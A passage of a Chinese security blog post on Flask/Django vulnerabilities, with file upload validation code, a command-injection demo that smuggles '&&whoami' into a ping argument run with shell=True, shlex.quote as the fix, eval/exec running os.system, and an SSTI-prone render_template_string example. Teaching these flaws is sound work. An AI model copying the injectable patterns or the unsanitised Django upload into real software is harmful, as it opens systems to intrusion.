<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment">#django </span><br>file.size  <span class="hljs-comment">#获取文件大小，字节</span><br><span class="hljs-comment">#flask</span><br>app.config[<span class="hljs-string">&#x27;MAX_CONTENT_LENGTH&#x27;</span>] = <span class="hljs-number">1</span> * <span class="hljs-number">1024</span> * <span class="hljs-number">1024</span>  <span class="hljs-comment">#限制1M大小</span><br></code></pre></td></tr></table></figure>

<p>对于文件类型，flask给出了完整的限制，利用已有的函数和方式</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><code class="hljs python">ALLOWED_EXTENSIONS = <span class="hljs-built_in">set</span>([<span class="hljs-string">&#x27;png&#x27;</span>, <span class="hljs-string">&#x27;jpg&#x27;</span>, <span class="hljs-string">&#x27;jpeg&#x27;</span>, <span class="hljs-string">&#x27;gif&#x27;</span>])  <span class="hljs-comment">#白名单</span><br>app.config[<span class="hljs-string">&#x27;UPLOAD_FOLDER&#x27;</span>] = os.path.join(os.path.dirname(__file__), <span class="hljs-string">&#x27;uploadfile&#x27;</span>)<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">allowed_file</span>(<span class="hljs-params">filename</span>):<br>    <span class="hljs-keyword">return</span> <span class="hljs-string">&#x27;.&#x27;</span> <span class="hljs-keyword">in</span> filename <span class="hljs-keyword">and</span> filename.rsplit(<span class="hljs-string">&#x27;.&#x27;</span>, <span class="hljs-number">1</span>)[-<span class="hljs-number">1</span>] <span class="hljs-keyword">in</span> ALLOWED_EXTENSIONS<br><br><span class="hljs-meta">@app.route(<span class="hljs-params"><span class="hljs-string">&#x27;/upload&#x27;</span>, methods=[<span class="hljs-string">&#x27;GET&#x27;</span>,<span class="hljs-string">&#x27;POST&#x27;</span>]</span>)</span><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">upload</span>():<br>    <span class="hljs-keyword">if</span> request.files.get(<span class="hljs-string">&#x27;filename&#x27;</span>):<br>        file = request.files.get(<span class="hljs-string">&#x27;filename&#x27;</span>)<br>        <span class="hljs-keyword">if</span> file <span class="hljs-keyword">and</span> allowed_file(file.filename):<br>            filename = secure_filename(file.filename)  <span class="hljs-comment">#处理文件名</span><br>            file.save(os.path.join(app.config[<span class="hljs-string">&#x27;UPLOAD_FOLDER&#x27;</span>], filename))<br>            <span class="hljs-keyword">return</span> render_template(<span class="hljs-string">&#x27;upload.html&#x27;</span>, file=<span class="hljs-string">&#x27;上传成功&#x27;</span>)<br>        <span class="hljs-keyword">else</span>:<br>            <span class="hljs-keyword">return</span> render_template(<span class="hljs-string">&#x27;upload.html&#x27;</span>, file=<span class="hljs-string">&#x27;不允许类型&#x27;</span>)<br>    <span class="hljs-keyword">else</span>:<br>        <span class="hljs-keyword">return</span> render_template(<span class="hljs-string">&#x27;upload.html&#x27;</span>, file=<span class="hljs-string">&#x27;选择文件&#x27;</span>)<br></code></pre></td></tr></table></figure>

<p>django也可以使用类似如上的写法</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><code class="hljs python">ALLOWED_EXTENSIONS = settings.ALLOWED_EXTENSIONS<br>UPLOAD_FOLDER = settings.UPLOAD_FOLDER<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">allowed_file</span>(<span class="hljs-params">filename</span>):<br>    <span class="hljs-keyword">return</span> <span class="hljs-string">&#x27;.&#x27;</span> <span class="hljs-keyword">in</span> filename <span class="hljs-keyword">and</span> filename.rsplit(<span class="hljs-string">&#x27;.&#x27;</span>, <span class="hljs-number">1</span>)[<span class="hljs-number">1</span>] <span class="hljs-keyword">in</span> ALLOWED_EXTENSIONS<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">UPLOADFILE</span>(<span class="hljs-params">request</span>):<br>    <span class="hljs-keyword">if</span> request.method==<span class="hljs-string">&#x27;GET&#x27;</span>:<br>        <span class="hljs-keyword">return</span> render(request,<span class="hljs-string">&#x27;upload.html&#x27;</span>)<br>    <span class="hljs-keyword">else</span>:<br>        img=request.FILES.get(<span class="hljs-string">&#x27;filename&#x27;</span>)<br>        <span class="hljs-keyword">if</span> img.size &lt; <span class="hljs-number">100000</span> <span class="hljs-keyword">and</span> allowed_file(img.name):<br>            f=<span class="hljs-built_in">open</span>(img.name,<span class="hljs-string">&#x27;wb&#x27;</span>)<br>            <span class="hljs-keyword">for</span> line <span class="hljs-keyword">in</span> img.chunks():<br>                f.write(line)<br>            f.close()<br>            <span class="hljs-keyword">return</span> render(request, <span class="hljs-string">&#x27;upload.html&#x27;</span>, &#123;<span class="hljs-string">&#x27;file&#x27;</span>:<span class="hljs-string">&#x27;上传成功&#x27;</span>&#125;)<br>        <span class="hljs-keyword">else</span>:<br>            <span class="hljs-keyword">return</span> render(request, <span class="hljs-string">&#x27;upload.html&#x27;</span>, &#123;<span class="hljs-string">&#x27;file&#x27;</span>:<span class="hljs-string">&quot;不允许的类型或者大小超限&quot;</span>&#125;)<br></code></pre></td></tr></table></figure>

<p>最后是对于文件名，保险起见可以将上传的文件进行重命名，比如<code>随机字符串+后缀</code>这种形式：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-meta">@app.route(<span class="hljs-params"><span class="hljs-string">&#x27;/upload&#x27;</span>, methods=[<span class="hljs-string">&#x27;GET&#x27;</span>, <span class="hljs-string">&#x27;POST&#x27;</span>]</span>)</span><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">upload</span>():<br>    <span class="hljs-keyword">if</span> request.method == <span class="hljs-string">&#x27;POST&#x27;</span>:<br>        <span class="hljs-keyword">if</span> <span class="hljs-string">&#x27;file&#x27;</span> <span class="hljs-keyword">not</span> <span class="hljs-keyword">in</span> request.files:<br>            flash(<span class="hljs-string">&#x27;No file part&#x27;</span>, <span class="hljs-string">&#x27;error&#x27;</span>)<br>            <span class="hljs-keyword">return</span> redirect(request.url)<br><br>        file = request.files[<span class="hljs-string">&#x27;file&#x27;</span>]<br><br>        <span class="hljs-keyword">if</span> file.filename == <span class="hljs-string">&#x27;&#x27;</span>:<br>            flash(<span class="hljs-string">&#x27;No selected file&#x27;</span>, <span class="hljs-string">&#x27;error&#x27;</span>)<br>            <span class="hljs-keyword">return</span> redirect(request.url)<br><br>        <span class="hljs-keyword">if</span> allowed_file(file.filename):<br>            filename = secure_filename(file.filename)<br>            suffix = filename.rsplit(<span class="hljs-string">&#x27;.&#x27;</span>, <span class="hljs-number">1</span>)[-<span class="hljs-number">1</span>] <span class="hljs-keyword">if</span> <span class="hljs-string">&#x27;.&#x27;</span> <span class="hljs-keyword">in</span> filename <span class="hljs-keyword">else</span> <span class="hljs-string">&#x27;&#x27;</span><br>            random_string = <span class="hljs-built_in">str</span>(uuid.uuid4())<br>            new_filename = <span class="hljs-string">f&quot;<span class="hljs-subst">&#123;random_string&#125;</span>.<span class="hljs-subst">&#123;suffix&#125;</span>&quot;</span><br>            file_path = os.path.join(app.config[<span class="hljs-string">&#x27;UPLOAD_FOLDER&#x27;</span>], new_filename)<br>            file.save(file_path)<br>            <span class="hljs-keyword">return</span> render_template(<span class="hljs-string">&quot;upload_success.html&quot;</span>, save_path=file_path)<br>        <span class="hljs-keyword">else</span>:<br>            flash(<span class="hljs-string">&#x27;Suffix is not allowed!&#x27;</span>, <span class="hljs-string">&#x27;error&#x27;</span>)<br>    <span class="hljs-keyword">return</span> render_template(<span class="hljs-string">&#x27;upload.html&#x27;</span>)<br></code></pre></td></tr></table></figure>



















<h3 id="session伪造-JWT"><a href="#session伪造-JWT" class="headerlink" title="session伪造&amp;JWT"></a>session伪造&amp;JWT</h3><p><a target="_blank" rel="noopener" href="https://www.leavesongs.com/PENETRATION/client-session-security.html">客户端session</a></p>
<p><code>Flask</code>将<code>session</code>存储在<code>cookie</code>中，被称为客户端<code>session</code>。</p>
<p>CTF常见+相关文章很多，这里就不写了。</p>
<p><a target="_blank" rel="noopener" href="https://www.tr0y.wang/2022/05/16/SecMap-flask/#session-%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2-%E4%BC%AA%E9%80%A0">session伪造</a></p>
<h3 id="命令注入"><a href="#命令注入" class="headerlink" title="命令注入"></a>命令注入</h3><p>Python中常见的执行外部命令的函数和模块主要有：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs python">os.system<br>subprocess.run<br>subprocess.Popen<br>os.popen<br></code></pre></td></tr></table></figure>

<p>比如对于<code>ping</code>命令来说：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-number">1.</span>os.system(<span class="hljs-string">&#x27;ping -c 4 127.0.0.1&#x27;</span>)<br><span class="hljs-number">2.</span>subprocess.run([<span class="hljs-string">&#x27;ping&#x27;</span>, <span class="hljs-string">&#x27;-c&#x27;</span>, <span class="hljs-string">&#x27;4&#x27;</span>, <span class="hljs-string">&#x27;127.0.0.1&#x27;</span>], capture_output=<span class="hljs-literal">True</span>, text=<span class="hljs-literal">True</span>)<br><span class="hljs-number">3.</span>subprocess.Popen([<span class="hljs-string">&#x27;ping&#x27;</span>, <span class="hljs-string">&#x27;-c&#x27;</span>, <span class="hljs-string">&#x27;4&#x27;</span>, <span class="hljs-string">&#x27;127.0.0.1&#x27;</span>], stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=<span class="hljs-literal">True</span>)<br><span class="hljs-number">4.</span><span class="hljs-keyword">with</span> os.popen(<span class="hljs-string">&#x27;ping -c 4 127.0.0.1&#x27;</span>) <span class="hljs-keyword">as</span> stream:<br>    output = stream.read()<br></code></pre></td></tr></table></figure>

<p><code>os.system</code>很常见，它通过<code>shell</code>运行命令，所以可以使用 shell 的特性，例如管道、重定向、复合命令等。</p>
<p>注意这里除了<code>os.system</code>都是可以捕获输出的，<code>subprocess.run</code>是推荐的在 Python 中运行外部命令的方法，提供了比 <code>os.system</code> 更强大的功能和更细粒度的控制，可以捕获命令的输出、错误和退出状态码，还可以设置超时等(<code>subprocess.Popen</code>比<code>run</code>还要灵活)。但注意这两个函数中要执行的命令和参数要通过列表传递，例如 <code>[&#39;ping&#39;, &#39;-c&#39;, &#39;4&#39;, &#39;127.0.0.1&#39;]</code>。当<code>Popen</code>使用<code>shell=True</code>的时候，<code>python</code>会调用<code>/bin/sh</code>来执行命令，这可以让你使用 shell 特性，例如管道、重定向和复合命令实现命令注入：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment">#windows</span><br>IP=<span class="hljs-string">&#x27;127.0.0.1&amp;&amp;whoami&#x27;</span><br>result = subprocess.run(<span class="hljs-string">f&#x27;ping /n 4 <span class="hljs-subst">&#123;IP&#125;</span>&#x27;</span>, shell=<span class="hljs-literal">True</span>, capture_output=<span class="hljs-literal">True</span>, text=<span class="hljs-literal">True</span>)<br><span class="hljs-built_in">print</span>(result)<br></code></pre></td></tr></table></figure>

<p>官方的建议是设置<code>shell=False</code>，并通过<code>shlex.quote</code>这个类似’’预编译’’的函数处理用户输入：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs python">IP=<span class="hljs-string">&#x27;127.0.0.1&amp;&amp;whoami&#x27;</span><br>safe_IP = shlex.quote(IP)<br>result = subprocess.run(<span class="hljs-string">f&#x27;ping /n 4 <span class="hljs-subst">&#123;safe_IP&#125;</span>&#x27;</span>, shell=<span class="hljs-literal">True</span>, capture_output=<span class="hljs-literal">True</span>, text=<span class="hljs-literal">True</span>)<br><span class="hljs-built_in">print</span>(result)<br><span class="hljs-comment">#CompletedProcess(args=&quot;ping /n 4 &#x27;127.0.0.1&amp;&amp;whoami&#x27;&quot;, returncode=1, stdout=&quot;Ping 请求找不到主机 &#x27;127.0.0.1。请检查该名称，然后重试。\n&quot;, stderr=&#x27;&#x27;)</span><br></code></pre></td></tr></table></figure>

<p>可以跟进去看下这个函数，其实就是将参数用单引号包裹，然后转义参数内已经存在的单引号：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs python">_find_unsafe = re.<span class="hljs-built_in">compile</span>(<span class="hljs-string">r&#x27;[^\w@%+=:,./-]&#x27;</span>, re.ASCII).search<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">quote</span>(<span class="hljs-params">s</span>):<br>    <span class="hljs-string">&quot;&quot;&quot;Return a shell-escaped version of the string *s*.&quot;&quot;&quot;</span><br>    <span class="hljs-keyword">if</span> <span class="hljs-keyword">not</span> s:<br>        <span class="hljs-keyword">return</span> <span class="hljs-string">&quot;&#x27;&#x27;&quot;</span><br>    <span class="hljs-keyword">if</span> _find_unsafe(s) <span class="hljs-keyword">is</span> <span class="hljs-literal">None</span>:<br>        <span class="hljs-keyword">return</span> s<br><br>    <span class="hljs-comment"># use single quotes, and put single quotes into double quotes</span><br>    <span class="hljs-comment"># the string $&#x27;b is then quoted as &#x27;$&#x27;&quot;&#x27;&quot;&#x27;b&#x27;</span><br>    <span class="hljs-keyword">return</span> <span class="hljs-string">&quot;&#x27;&quot;</span> + s.replace(<span class="hljs-string">&quot;&#x27;&quot;</span>, <span class="hljs-string">&quot;&#x27;\&quot;&#x27;\&quot;&#x27;&quot;</span>) + <span class="hljs-string">&quot;&#x27;&quot;</span><br></code></pre></td></tr></table></figure>

<p>比如：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs python">s = <span class="hljs-string">&quot;it&#x27;s a test&quot;</span><br>s=shlex.quote(s)<br><span class="hljs-built_in">print</span>(s)<br><span class="hljs-comment">#&#x27;it&#x27;&quot;&#x27;&quot;&#x27;s a test&#x27;</span><br></code></pre></td></tr></table></figure>

<p>另外，<code>exec</code>和<code>eval</code>用来执行<code>Python</code>代码字符串(也可以执行外部命令，但有点大材小用了<a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/6902?time__1311=n4+xnD0DgDuAG=tGQD/iW4BKEQkm8DB7ADWqID">参考文章</a>)：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment">#exec 用于执行动态的 Python 代码。这些代码可以包括变量赋值、函数定义、循环、条件语句等。exec 执行的代码不返回值。</span><br>code = <span class="hljs-string">&quot;&quot;&quot;</span><br><span class="hljs-string">def greet(name):</span><br><span class="hljs-string">    print(f&#x27;Hello, &#123;name&#125;!&#x27;)</span><br><span class="hljs-string"></span><br><span class="hljs-string">greet(&#x27;Alice&#x27;)</span><br><span class="hljs-string">&quot;&quot;&quot;</span><br><span class="hljs-built_in">exec</span>(code) <span class="hljs-comment"># Hello, Alice!</span><br><br><span class="hljs-comment">#eval 用于计算动态的 Python 表达式并返回结果。与 exec 不同，eval 只能执行单个表达式，并且会返回该表达式的结果。</span><br>expression = <span class="hljs-string">&quot;2 + 3 * 4&quot;</span><br>result = <span class="hljs-built_in">eval</span>(expression)<br><span class="hljs-built_in">print</span>(result)  <span class="hljs-comment"># 14</span><br></code></pre></td></tr></table></figure>

<p>执行外部命令：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs python">command = <span class="hljs-string">&quot;__import__(&#x27;os&#x27;).system(&#x27;echo Hello from eval&#x27;)&quot;</span><br><span class="hljs-built_in">eval</span>(command)  <br><br>command = <span class="hljs-string">&quot;__import__(&#x27;os&#x27;).system(&#x27;echo Hello from exec&#x27;)&quot;</span><br><span class="hljs-built_in">exec</span>(command)  <br></code></pre></td></tr></table></figure>

<h3 id="SSTI"><a href="#SSTI" class="headerlink" title="SSTI"></a>SSTI</h3><p>在<code>Flask</code>中，用于渲染模板的函数:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs python">render_template(<span class="hljs-string">&#x27;index.html&#x27;</span>, name=name)<br><br>render_template_string(template %name)<br><br>Template(template_str).render()<br></code></pre></td></tr></table></figure>

<p>利用<code>render_template_string</code>实现<code>SSTI</code>:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs python">template = <span class="hljs-string">&quot;&lt;h1&gt;Hello , %s&lt;/h1&gt;&quot;</span><br>render_template_string(template %name)<br></code></pre></td></tr></table></figure>

<p>其实这就和格式化字符串有点像了，SSTI仅出现在模板以字符串形式出现的时候。使用<code>render_template</code>进行模板渲染的时候我不认为会出现SSTI。</p>
<h1 id="Hack-My-FnD"><a href="#Hack-My-FnD" class="headerlink" title="Hack_My_FnD"></a>Hack_My_FnD</h1><p>学习项目，分别利用<code>Flask/Django</code>开发的在线论坛应用<img src="/img/11c117fb2163eb00c4af2070833395fe.png" srcset="/img/loading.gif" lazyload alt="11c117fb2163eb00c4af2070833395fe"></p>
<h1 id="环境"><a href="#环境" class="headerlink" title="环境"></a>环境</h1><p>整个项目基于python3.11，漏洞示例代码在django 5.0.7,flask 3.0.7上演示。</p>
<h1 id="Inspired-by"><a href="#Inspired-by" class="headerlink" title="Inspired by"></a>Inspired by</h1><p>  <a target="_blank" rel="noopener" href="https://github.com/MisakiKata/python_code_audit">https://github.com/MisakiKata/python_code_audit</a></p>
<figure class="highlight clean"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><code class="hljs clean">#     <span class="hljs-keyword">if</span> tbody_element:<br>#         for tr <span class="hljs-keyword">in</span> tbody_element.find_all(<span class="hljs-string">&#x27;tr&#x27;</span>):<br>                # <span class="hljs-keyword">if</span> <span class="hljs-string">&#x27;-&#x27;</span> <span class="hljs-keyword">in</span> first_element:<br>                #     prefix, change = first_element.split(<span class="hljs-string">&#x27;-&#x27;</span>)<br>                #     prefix = int(prefix)  # 转换为整数<br>                #     change = int(change)  # 转换为整数<br>                # else:<br>                #     prefix = int(first_element[:<span class="hljs-number">-1</span>])  # 除去最后一位的部分<br>                #     change = int(first_element[<span class="hljs-number">-1</span>])  # 最后一位的部分<br><br>    #             separated_entry = [prefix, change] + entry[<span class="hljs-number">1</span>:]<br>    #             separated_data.append(separated_entry)<br>    #<br>    #         for item <span class="hljs-keyword">in</span> separated_data:<br>    #             print(item)<br></code></pre></td></tr></table></figure>


                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div></div>
      <div>http://example.com/2024/10/13/README/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>notbad3</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2024年10月13日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2025/01/04/2025-1-28-2022-2025%E5%B9%B4%E5%BA%A6%E6%80%BB%E7%BB%93/" title="2022-2025，打个总结">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">2022-2025，打个总结</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2024/09/01/XSS-in-FlaskDjango/" title="Flask/Django中的XSS">
                        <span class="hidden-mobile">Flask/Django中的XSS</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
